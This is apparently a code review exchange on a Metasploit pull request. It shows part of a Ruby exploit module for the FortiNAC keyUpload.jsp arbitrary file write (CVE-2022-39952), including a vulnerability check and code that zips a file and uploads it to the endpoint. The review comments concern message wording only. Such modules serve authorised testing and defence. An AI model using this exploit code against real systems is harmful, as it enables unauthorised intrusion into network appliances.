modules/exploits/linux/http/fortinac_keyupload_file_write.rb

```diff
@@ -0,0 +1,149 @@
+          FortiNAC 8.3 all versions
+        },
+        'Author' => [
+          'Gwendal Guégniaud', # discovery
+          'Zach Hanley',       # PoC
+          'jheysel-r7'         # module
+        ],
+        'References' => [
+          ['URL', 'https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/'],
+          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-300'],
+          ['URL', 'https://github.com/horizon3ai/CVE-2022-39952'],
+          ['URL', 'https://attackerkb.com/topics/9BvxYuiHYJ/cve-2022-39952'],
+          ['CVE', '2022-39952']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[linux python],
+        'Privileged' => true,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 8443,
+          'WfsDelay' => '75'
+        },
+        'Arch' => [ ARCH_CMD, ARCH_X64, ARCH_X86 ],
+        'Targets' => [
+          [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-02-16',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'configWizard', 'keyUpload.jsp'),
+      'method' => 'POST'
+    })
+
+    return Exploit::CheckCode::Unknown('Target did not respond') unless res
+    return Exploit::CheckCode::Safe("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200
+    return Exploit::CheckCode::Appears('Target indicated a successful upload occurred!') if res.body.include?('yams.jsp.portal.SuccessfulUpload')
+
+    Exploit::CheckCode::Safe('The target responded with a 200 OK message, however it did not appear to indicate that a successful upload occurred!')
+  end
+
+  def zip_file(filepath, contents)
+    zip = Rex::Zip::Archive.new
+    zip.add_file(filepath, contents)
+
+    zip.pack
+  end
+
+  def send_zip_file(filename, contents, file_description)
+    mime = Rex::MIME::Message.new
+    mime.add_part(contents, nil, 'binary', "form-data; name=\"key\"; filename=\"#{filename}\"")
+
+    print_status("Sending zipped #{file_description} to /configWizard/keyUpload.jsp")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'configWizard', 'keyUpload.jsp'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
+    })
+    fail_with(Failure::Unknown, 'Failed to send the zip file to /configWizard/keyUpload.jsp') unless res && res.code == 200 && res.body.include?('yams.jsp.portal.SuccessfulUpload')
+    vprint_good('Successfully sent zip file')
```

Comment:
```suggestion
    fail_with(Failure::Unknown, 'Failed to send the ZIP file to /configWizard/keyUpload.jsp') unless res && res.code == 200 && res.body.include?('yams.jsp.portal.SuccessfulUpload')
    print_good('Successfully sent ZIP file')
```

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/17750/commits/3bd4c15704d987f55336e1da839934937602928b